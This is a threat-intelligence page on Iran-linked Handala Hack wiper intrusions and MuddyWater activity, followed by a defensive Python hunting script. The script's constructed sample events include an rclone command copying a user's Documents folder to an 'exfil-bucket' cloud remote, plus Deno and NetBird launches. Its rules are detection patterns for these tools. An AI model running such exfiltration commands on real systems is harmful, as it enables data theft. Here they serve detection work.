Iran-Linked Handala Hack Wiper Campaign Against Israeli and U.S. Organizations
Handala Hack, an online persona tied to Void Manticore and assessed by multiple researchers as linked to Iran’s Ministry of Intelligence and Security (MOIS), is being tracked for destructive intrusions involving wiper attacks and related hack-and-leak activity against organizations in Israel and the United States. Public reporting cited by Unit 42 says attackers gained access to corporate networks using legitimate user credentials, while recent tradecraft includes phishing, identity compromise, and abuse of administrative access through Microsoft Intune. Israel’s National Cyber Directorate warned that several incidents involved deletion of servers and workstations to disrupt operations, reinforcing concern that the current regional conflict is increasing the likelihood of further destructive cyber activity.
Technical reporting indicates the actor continues to favor hands-on-keyboard operations, multiple wiping methods, and a mix of custom and publicly available tooling. Check Point said newly observed techniques include use of NetBird for tunneling and an AI-assisted PowerShell script for wiping, while Blackpoint’s advisory highlighted a broader Iranian threat posture featuring credential theft, phishing, password spraying, remote management tools, and exfiltration utilities such as Rclone. The combined reporting points to a near-term risk of disruptive attacks focused on identity compromise, lateral movement, data theft, and system destruction, particularly for organizations with exposed services, weak privilege controls, or insufficiently protected administrative accounts.
Related Stories

Iran-linked MuddyWater intrusions and heightened retaliation risk after U.S.-Israeli strikes
Following the Feb. 28, 2026 U.S.-Israeli strikes on Iran, reporting indicates a **heightened risk of Iranian retaliatory cyber activity** against U.S. and allied organizations, with expected operations spanning **ransomware, DDoS (including as cover for deeper intrusions), data leaks from prior exfiltration, and aggressive social engineering** (e.g., fake job offers and malicious attachments). Likely target sets highlighted include **critical infrastructure**, **banking**, and environments involving **industrial control systems/PLCs**, with emphasis on disciplined execution of security fundamentals (patching, log review, and tighter email/attachment handling) rather than overreliance on automation. Separately, **MuddyWater** (*Seedworm*), an Iran-linked APT, was reported active in multiple U.S. organizations since early Feb. 2026, with activity increasing after the strikes. Symantec and Carbon Black researchers described targeting that included a **U.S. bank**, an **airport**, a **non-profit**, and the **Israel operation of a U.S. software company** supplying the defense/aerospace sector, and identified a previously unknown backdoor, **Dindoor**, observed in several victims; **Dindoor executes via `Deno`** (a JavaScript/TypeScript runtime). Commentary in the reporting also warned to assume potential **pre-positioning** in high-value targets and recommended proactive hunting for signs of persistent access before activation.
1 week ago
Iranian MOIS-Linked Threat Actors Increasingly Leverage Cybercrime Tools and Infrastructure
Check Point Research reported that **Iranian Ministry of Intelligence and Security (MOIS)-linked actors** are increasingly moving beyond simply *posing* as cybercriminals and are instead **directly engaging with the cybercrime ecosystem**—using criminal tooling, services, and operational models to support state objectives while complicating attribution. The activity is highlighted in operations tied to **Void Manticore** (including the *Handala Hack* persona) and **MuddyWater**, where researchers observed repeated overlaps with criminal tools and infrastructure, suggesting an affiliate-style or service-consumption model that improves resilience and capability. Reporting on the research noted that **Void Manticore** has incorporated the commercially sold infostealer **Rhadamanthys** (marketed on cybercrime forums) into campaigns, including phishing activity targeting Israeli entities; the infostealer has been paired with custom wipers and lure themes such as impersonated **F5 updates** and even messages spoofing the **Israeli National Cyber Directorate (INCD)**. The same coverage reiterated that **MuddyWater** continues MOIS-aligned espionage activity and is also associated with cybercrime-style tooling and services, reinforcing the assessment that Iranian state operators are increasingly blending state tradecraft with criminal malware, infrastructure, and monetized services rather than relying solely on false-flag “ransomware” or hacktivist branding.
6 days ago
Iran-Linked Cyber Activity Escalates Amid Middle East Conflict
Iran-nexus cyber activity intensified alongside regional military escalation, with multiple reporting streams describing both opportunistic and targeted operations. Check Point Research observed a coordinated campaign to compromise internet-connected **IP cameras** across Israel, the UAE, Qatar, Bahrain, Kuwait, Lebanon, and Cyprus, with spikes in exploitation attempts aligning to geopolitical events; activity was traced to infrastructure linked to Iran-nexus actors using commercial VPN exit nodes (e.g., *Mullvad*, *ProtonVPN*, *Surfshark*, *NordVPN*) and VPS infrastructure to mask origin, and the most targeted vendors were **Hikvision** and **Dahua**. Separately, Symantec reported **Seedworm** (*MuddyWater/Temp Zagros/Static Kitten*) activity on multiple U.S. and Canadian organizations beginning in February 2026, including a U.S. bank, airport, non-profit, and the Israeli operations of a U.S. software supplier to defense/aerospace; Symantec identified a previously unknown backdoor dubbed **Dindoor** (leveraging the *Deno* runtime) and a Python backdoor **Fakeset**, with malware signed using certificates issued to “**Amy Cherne**” (and in some cases “**Donald Gay**”), and noted attempted data exfiltration using **Rclone** to a *Wasabi* cloud storage bucket. Additional coverage indicates broader pro-Iranian cyber activity but is less specific to the above intrusions. ASEC’s weekly “Ransom & Dark Web Issues” roundup flags **pro-Iranian/pro-Islamist hacktivist** attacks against Middle Eastern and pro-Western targets, but provides limited technical detail in the excerpt. 
A podcast episode describing “Iran’s 12 days of cyber war” and global OT targeting (including *Unitronics* PLCs) is largely commentary and retrospective framing rather than a discrete, verifiable incident report, and two other items in the set (a Russia-linked **APT28** phishing/malware campaign in Ukraine and a China-nexus **UAT-9244** telecom intrusion set in South America) describe unrelated threat activity outside the Iran-focused escalation.
5 days ago
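As an added hunting example (not code from the page or from any of the cited reports), the Python below runs a handful of rules over constructed process-creation events for the tooling named in the main article and the two related stories above: Rclone transfers to a cloud-storage remote (reported as exfiltration to a Wasabi bucket), scripts executed through the Deno runtime (how Dindoor is reported to run), NetBird client activity (reported for tunnelling), and images signed under the "Amy Cherne" / "Donald Gay" certificate names reported by Symantec. The event records, field names and command lines are assumptions for illustration; the reporting does not reproduce the actor's real command lines.

```python
"""Hunting rules, over constructed process-creation events, for the tooling named
in the reporting above: Rclone copies to a cloud-storage remote, scripts run by
the Deno runtime, NetBird client activity, and images signed under the
certificate names reported by Symantec. All events below are constructed for
this example; none is real telemetry."""
import re
from dataclasses import dataclass

# Signer names from the Symantec reporting summarised above.
SUSPICIOUS_SIGNERS = {"amy cherne", "donald gay"}

# rclone sub-commands that move data; "remote:path" is rclone's destination
# syntax. These are generic rclone conventions, not the actor's exact commands.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_REMOTE = re.compile(r'^(?P<remote>[A-Za-z0-9_-]+):(?P<path>.*)$')


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def split_cmdline(command_line):
    """Quote-aware split of a Windows command line; surrounding quotes are stripped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def cloud_remote(token):
    """Return the rclone remote name if token looks like remote:path, else None.
    A single letter followed by a path separator is a Windows drive (C:\\...),
    not a remote (assumption: one-letter remote names are not in use here)."""
    m = RCLONE_REMOTE.match(token)
    if not m:
        return None
    name, path = m.group("remote"), m.group("path")
    if len(name) == 1 and path[:1] in ("\\", "/", ""):
        return None
    return name


def hunt(events):
    """Apply the rules to each event; returns a list of Finding in event order."""
    findings = []
    for ev in events:
        pid = ev["pid"]
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        argv = split_cmdline(ev["command_line"])
        # Tokens that are not flags: sub-command, sources, destinations.
        positionals = [a for a in argv[1:] if not a.startswith("-")]

        # Rule 1: rclone moving data to/from a cloud remote (page: Rclone -> Wasabi).
        if exe == "rclone.exe" and positionals and positionals[0].lower() in RCLONE_VERBS:
            remotes = [r for r in map(cloud_remote, positionals[1:]) if r]
            if remotes:
                findings.append(Finding("rclone_cloud_remote", pid,
                                        f"rclone {positionals[0]} using remote(s) {remotes}"))

        # Rule 2: a script executed by the Deno runtime (page: Dindoor runs via Deno).
        if exe in ("deno.exe", "deno") and positionals and positionals[0].lower() == "run":
            script = positionals[-1] if len(positionals) > 1 else "<no script>"
            findings.append(Finding("deno_run", pid, f"Deno executing {script}"))

        # Rule 3: NetBird client activity (page: NetBird used for tunnelling).
        # Tune with an allowlist where NetBird is an approved corporate tool.
        if exe.startswith("netbird"):
            findings.append(Finding("netbird", pid, f"NetBird client: {ev['command_line']}"))

        # Rule 4: Authenticode signer matching the reported certificate names.
        if ev.get("signer", "").lower() in SUSPICIOUS_SIGNERS:
            findings.append(Finding("suspicious_signer", pid, f"signed by '{ev['signer']}'"))
    return findings


# Constructed sample telemetry (field names and command lines are illustrative).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Tools\rclone.exe", "signer": "",
     "command_line": r'rclone.exe copy "C:\Users\ops\Documents" wasabi:exfil-bucket --transfers 8'},
    {"pid": 5232, "image": r"C:\ProgramData\svc\deno.exe", "signer": "Amy Cherne",
     "command_line": r"deno.exe run --allow-all C:\ProgramData\svc\update.ts"},
    {"pid": 6010, "image": r"C:\Program Files\NetBird\netbird.exe", "signer": "",
     "command_line": "netbird.exe up"},
    # Benign controls: a local-to-local rclone backup and a Microsoft-signed script host.
    {"pid": 7001, "image": r"C:\Tools\rclone.exe", "signer": "",
     "command_line": r"rclone.exe sync C:\Data D:\Backup\Data"},
    {"pid": 7100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "signer": "Microsoft Windows", "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

The local-to-local rclone event is deliberately included as a control: the remote check is what separates a routine backup from a copy to cloud storage, and the drive-letter exclusion is the edge case that would otherwise produce false positives on every Windows path. In a real environment these rules are a starting point for a hunt, not a signature; pair them with the identity-side signals (Intune administrative actions, password-spray patterns) that the reporting also highlights.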